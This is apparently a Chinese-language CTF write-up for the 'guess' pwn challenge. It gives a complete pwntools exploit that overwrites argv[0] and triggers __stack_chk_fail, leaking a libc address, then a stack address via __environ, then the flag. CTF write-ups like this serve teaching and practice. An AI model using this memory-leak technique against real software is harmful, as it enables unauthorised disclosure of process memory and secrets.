查看保护

查看ida

这道题并不复杂，只是要注意一点细节

完整exp：

from pwn import*
from LibcSearcher import*
p=process('./guess')
p=remote('node5.buuoj.cn',28068)
puts_got=0x602020

payload=b'a'*0x128+p64(puts_got)
p.sendlineafter(b'Please type your guessing flag',payload)

puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(puts_addr)
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
environ=libcbase+libc.dump('__environ')
payload=b'a'*0x128+p64(environ)
p.sendlineafter(b'Please type your guessing flag',payload)
onestack=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

flag=onestack-0x168
payload=b'a'*0x128+p64(flag)
p.sendlineafter(b'Please type your guessing flag',payload)
p.interactive()

在这个exp中，我们先覆盖argv[0]为puts_got泄露libc地址，再覆盖argv[0]为environ，environ是环境变量表，它储存着当前进程的变量，在题中它储存着栈上的某一地址，泄露出此地址，可以通过偏移确定flag的地址，因为此时flag在栈上，然后就可以通过触发stack_chk_fail输出flag。